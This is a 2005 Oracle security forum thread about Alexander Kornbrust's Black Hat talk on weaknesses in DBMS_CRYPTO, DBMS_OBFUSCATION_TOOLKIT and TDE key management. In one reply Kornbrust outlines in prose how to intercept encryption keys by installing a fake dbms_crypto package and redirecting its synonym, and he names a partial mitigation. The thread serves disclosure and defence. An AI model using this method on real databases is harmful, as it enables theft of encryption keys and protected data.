Call: +44 (0)7759 277220 Call
Forum

Welcome, Guest. Please Login.
Dec 8th, 2024, 9:23pm
News: Welcome to Pete Finnigan's Oracle security forum
Home | Help | Search | Members | Login
   Pete Finnigan's Oracle Security Forum
   Oracle Security
   Oracle Security
(Moderator: Pete Finnigan)
   Alexander Kornbrust - Black Hat 2005 Presentation
« Previous topic | Next topic »
Pages: 1  Reply | Notify of replies | Send Topic | Print
   Author  Topic: Alexander Kornbrust - Black Hat 2005 Presentation  (Read 10852 times)
Pete Finnigan
PeteFinnigan.com Administrator
*****




Oracle Security is easier if you design for it

   
View Profile | WWW | Email

Gender: male
Posts: 309
Alexander Kornbrust - Black Hat 2005 Presentation
« on: Jul 27th, 2005, 7:51am »
Quote | Modify

What do you think about the latest info coming from Alex Kornbrust. It seems that there is no safe way to keep the data inside the database secured. Is there someone who attend this Black Hat presentation and who could write in the forum more details about Alex's findings.
URL from the news:
Oracle's encryption not secure, researcher says
The best encryption that DBMS_OBFUSCATION_TOOLKIT offers is 192-bit encryption by using Triple DES (3DES) algorithm in Oracle9i. I don't know how this is changed in 10g but it seems that it doesn't matter because anyway, everyone who have an DBA account could decrypt the data. Is the Transparent Data Encryption (coming with 10g) the only preferable way to keep the data secure, especially when there is requirement that is coming from "security company standards". For example, I know that for all companies that are working with Visa, there is a requirement for at least 256-bit or 512-bit (I am not sure) encryption key that they must used.
I just want to initiate some discussion about this subject - "How to keep our data secured within an Oracle database by using encryption"
IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Pete Finnigan
PeteFinnigan.com Administrator
*****




Oracle Security is easier if you design for it

   
View Profile | WWW | Email

Gender: male
Posts: 309
Re: Alexander Kornbrust - Black Hat 2005 Presentat
« Reply #1 on: Jul 27th, 2005, 2:33pm »
Quote | Modify

Hi Rado,
 
Thanks for your post about Alex's talk at Black Hat in Las Vegas. I have seen the text for his talk and was also aware of the news article you mention but I don't think I can talk about specific details here yet as I don't know if it has been given yet or whether the talk notes would be made public. I am reasonably sure Alex will publish them on his own site Red Database Security when he gets back.
 
That said we can still discuss the general issue. I want to make two points really for now. The first is that the underlying problem with Oracle's DBMS_OBFUSCATION_TOOLKIT and DBMS_CRYPTO packages is not the algorithms themselves but the issue of key management.  This is an issue to which Alex alludes in his talk. There are other issues as well.  
 
The second issue is that at present TDE in 10gR2 doesn't on the surface look any more secure that the previous methods employed by Oracle. A number of bugs have already been found in TDE that allows the keys to become known easily.
IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Pete Finnigan
PeteFinnigan.com Administrator
*****




Oracle Security is easier if you design for it

   
View Profile | WWW | Email

Gender: male
Posts: 309
Re: Alexander Kornbrust - Black Hat 2005 Presentat
« Reply #2 on: Jul 27th, 2005, 3:24pm »
Quote | Modify

Hi, Pete
 
Thank you for your reply. Oracle are doing many efforts for improving the database security but for now there are so many bugs and findings that are discovered very frequently. The last thing - "patch for the security patch" doesn't sounds well.
 
I am supporting the idea for opening of this kind of forum - related mainly to Oracle security and I hope that it will become very popular.
IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Pete Finnigan
PeteFinnigan.com Administrator
*****




Oracle Security is easier if you design for it

   
View Profile | WWW | Email

Gender: male
Posts: 309
Re: Alexander Kornbrust - Black Hat 2005 Presentat
« Reply #3 on: Jul 27th, 2005, 4:42pm »
Quote | Modify

Hi Rado,
 
Thanks for your reply. Yes you are right at the moment there are a lot of issues with bugs, patches that need to be patched, silent fixes, advisories released for unfixed bugs and of course the fact that a lot of bugs are still not fixed (those reported on sites such as Red Database Security and Argeniss)but we should not forget that Oracle have made some great strides forward with new functionality (TDE, OS audit as xml, FGA and RLS...) in recent years and also they have improved their patch process a bit - at least on the documentation side - there needs to be work done on getting fixes done quicker and also on their recent problems of patches for patches, quality and testing. But it is better than random security advisories we had before that no one knew when to expect that included much less details.
IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Pete Finnigan
PeteFinnigan.com Administrator
*****




Oracle Security is easier if you design for it

   
View Profile | WWW | Email

Gender: male
Posts: 309
Re: Alexander Kornbrust - Black Hat 2005 Presentat
« Reply #4 on: Jul 29th, 2005, 7:41am »
Quote | Modify

Hi All,
 
For everyone who is interested - the link for the previously mentioned presentation:
http://www.blackhat.com/presentations/bh-usa-05/BH_US_05-Kornbrust/BH_US _05-Kornbrust.pdf
IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Pete Finnigan
PeteFinnigan.com Administrator
*****




Oracle Security is easier if you design for it

   
View Profile | WWW | Email

Gender: male
Posts: 309
Re: Alexander Kornbrust - Black Hat 2005 Presentat
« Reply #5 on: Jul 29th, 2005, 3:21pm »
Quote | Modify

Hi Rado,
 
Have you managed to open it? I tried to view it in IE and also downloaded it but neither option worked. I have emailed blackhat to ask if it is a problem their end.
 
cheers
 
Pete
IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Pete Finnigan
PeteFinnigan.com Administrator
*****




Oracle Security is easier if you design for it

   
View Profile | WWW | Email

Gender: male
Posts: 309
Re: Alexander Kornbrust - Black Hat 2005 Presentat
« Reply #6 on: Jul 29th, 2005, 3:26pm »
Quote | Modify

Plus, forgot to mention Esteban Martínez Fayó - presentation is available here and Cesar Cerrudo's is available here. At the moment I cannot read theirs either..Sad - I will get a newer version of acrobat and see if that works. As far as I know Alex, Esteban, Cesar and David Litchfield were the only ones to talk about Oracle
 
cheers
 
Pete
IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Pete Finnigan
PeteFinnigan.com Administrator
*****




Oracle Security is easier if you design for it

   
View Profile | WWW | Email

Gender: male
Posts: 309
Re: Alexander Kornbrust - Black Hat 2005 Presentat
« Reply #7 on: Jul 29th, 2005, 3:40pm »
Quote | Modify

Hi, Pete
 
I sent them as three attached pdf files to you official email.
 
Best regards
IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Pete Finnigan
PeteFinnigan.com Administrator
*****




Oracle Security is easier if you design for it

   
View Profile | WWW | Email

Gender: male
Posts: 309
Re: Alexander Kornbrust - Black Hat 2005 Presentat
« Reply #8 on: Aug 4th, 2005, 2:59pm »
Quote | Modify

Hello
 
an updated version of the presentation is available on my website:
 
 
Cheers
 
 Alexander Kornbrust
IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Pete Finnigan
PeteFinnigan.com Administrator
*****




Oracle Security is easier if you design for it

   
View Profile | WWW | Email

Gender: male
Posts: 309
Re: Alexander Kornbrust - Black Hat 2005 Presentat
« Reply #9 on: Aug 4th, 2005, 3:42pm »
Quote | Modify

Thanks Alex,
 
welcome to the forum!
 
cheers
 
Pete
IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Pete Finnigan
PeteFinnigan.com Administrator
*****




Oracle Security is easier if you design for it

   
View Profile | WWW | Email

Gender: male
Posts: 309
Re: Alexander Kornbrust - Black Hat 2005 Presentat
« Reply #10 on: Aug 4th, 2005, 6:34pm »
Quote | Modify

Hello  
 
here a short summary of my presentation. Interception of encryption keys is easy if a hacker (or DBA) installs a special package which intercepts all parameters and pass the parameter to the original package. DBA permission is not always required.
 
 
1. Install a dbms_crypto package with the same specification as the original dbms_crypto.
 
Sample see dbms_crypto_fake.sql
 
2. Create a private synonym or modify the public synonym.
 
That's all. You find all encryption keys in the log file of your web server.
 
 
It is possible to mitigate the risk (a little bit) by
 
  * using full qualified names (e.g. SYS.DBMS_CRYPTO)
 
 
 
Regards
 
 Alex
IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Pete Finnigan
PeteFinnigan.com Administrator
*****




Oracle Security is easier if you design for it

   
View Profile | WWW | Email

Gender: male
Posts: 309
Re: Alexander Kornbrust - Black Hat 2005 Presentat
« Reply #11 on: Aug 5th, 2005, 8:35pm »
Quote | Modify

Alex,
 
Your presentation materials are awesome.  I really enjoyed reading them, especially the nonsense quotes in the beginning of the presentation.
 
Thank you,
 
-Josh
IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Pete Finnigan
PeteFinnigan.com Administrator
*****




Oracle Security is easier if you design for it

   
View Profile | WWW | Email

Gender: male
Posts: 309
Re: Alexander Kornbrust - Black Hat 2005 Presentat
« Reply #12 on: Aug 6th, 2005, 2:59pm »
Quote | Modify

Josh,
 
Most people believe that the product documentation or specialised books are saying the truth.  
 
DBMS_CRYPTO/DBMS_OBFUCSATION_TOOLKIT is nearly useless in the current architecture. This has also side effects to the Oracle product stack.  
 
Oracle itself is not able to store the passwords/data in a secure manner. That is probably the reason why Oracle itself is using dbms_crypto/dbms_otk very rarely.  I know only 4 components (ultrasearch, MGW, DM and Grid Control) in the database which are using dbms_crypto/otk.
 
Regards
 
 Alex
IP Logged

Pete Finnigan (email:pete@petefinnigan.com)
Oracle Security Web site: http://www.petefinnigan.com
Forum: http://www.petefinnigan.com/forum/yabb/YaBB.cgi
Oracle security blog: http://www.petefinnigan.com/weblog/entries/index.html
Pages: 1  Reply | Notify of replies | Send Topic | Print

« Previous topic | Next topic »

Powered by YaBB 1 Gold - SP 1.4!
Forum software copyright © 2000-2004 Yet another Bulletin Board
  • PFCLScan PFCLScan

    Simply connect PFCLScan to your Oracle database and it will automatically discover the security issues that could make your Oracle database vulnerable to attack and to the potential loss of your data.

  • PFCL Obfuscate PFCLObfuscate

    PFCLObfuscate is the only tool available that can automatically add license controls to your PL/SQL code. PFCLObfuscate protects your Intellectual Property invested in your PL/SQL database code.

  • PFCLCode PFCLCode

    PFCLCode is a tool to allow you to analyse your PL/SQL code for many different types of security issues. PFCLCode gives you a detailed review and reports and includes a powerful colour syntax highlighting code editor

  • PFCLForensics PFCLForensics

    PFCLForensics is the only tool available to allow you to do a detailed live response of a breached Oracle database and to then go on and do a detailed forensic analysis of the data gathered.

  • Products We resell PFCLReselling

    PeteFinnigan.com Limited has partnered with a small number of relevant companies to resell their products where they enhance or compliment what we do

  • PFCLATK PFCLATK

    PFCLATK is a toolkit that allows detailed pre-defined policy driven audit trails for your Oracle database. The toolkit also provides for a centralised audit trail and centralised activity reporting

  • PFCLCookie PFCLCookie

    PFCLCookie is a useful tool to use to audit your websites for tracking cookies. Scan websites in a natural way using powerful browser driven scanner

  • PFCL Training PFCLTraining

    PFCLTraining is a set of expert training classes for you, aimed at teaching how to audit your own Oracle database, design audit trails, secure code in PL/SQL and secure and lock down your Oracle database.

  • PFCL Services PFCLServices

    Choose PFCLServices to add PeteFinnigan.com Ltd to your team for your Oracle Security needs. We are experts in performing detailed security audits, data security design work and policy creation

  • PFCLConsulting PFCLConsulting

    Choose PFCLConsulting to ask PeteFinnigan.com Limited to set up and use our products on your behalf

  • PFCLCustom PFCLCustom

    All of our software products can be customised at a number of levels. Choose this to see how our products can be part of your products and services

  • PFCLCloud PFCLCloud

    Private cloud, public cloud, hybrid cloud or no cloud. Learn how all of our services, trainings and products will work in the cloud

  • PFCLUserRights PFCLUserRights

    PFCLUserRights allows you to create a very detailed view of database users rights. The focus of the reports is to allow you to decide what privileges and accounts to keep and which to remove.

  • PFCLSTK PFCLSTK

    PFCLSTK is a toolkit application that allows you to provide database security easily to an existing database. PFCLSTK is a policy driven toolkit of PL/SQL that creates your security

  • PFCLSFTK PFCLSFTK

    PFCLSFTK is a toolkit that solves the problem of securing third party applications written in PL/SQL. It does this by creating a thin layer between the application and database and this traps SQL Injection attempts. This is a static firewall.

  • PFCLSEO PFCLSEO

    PFCLSEO is a web scanner based on the PFCLScan technology so that a user can easily scan a website for technical SEO issues